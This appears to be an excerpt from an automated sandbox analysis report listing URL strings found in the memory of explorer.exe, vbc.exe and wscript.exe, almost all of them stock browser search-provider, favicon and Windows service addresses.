Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000008.00000000.2181497235.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000008.00000000.2195288606.0000000004F30000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389538314.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://wordpress.org
Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000008.00000000.2181497235.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
